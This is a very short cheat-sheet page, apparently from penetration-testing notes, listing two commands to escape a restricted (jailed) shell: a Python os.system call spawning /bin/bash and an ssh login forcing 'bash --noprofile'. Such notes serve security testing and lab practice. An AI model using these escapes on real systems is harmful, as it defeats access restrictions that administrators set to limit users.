Jailed Shell Escape

Resources:

Escape a restricted shell with echo command:

echo os.system('/bin/bash')

ssh <username>@<ip> -t "bash --noprofile"

Last updated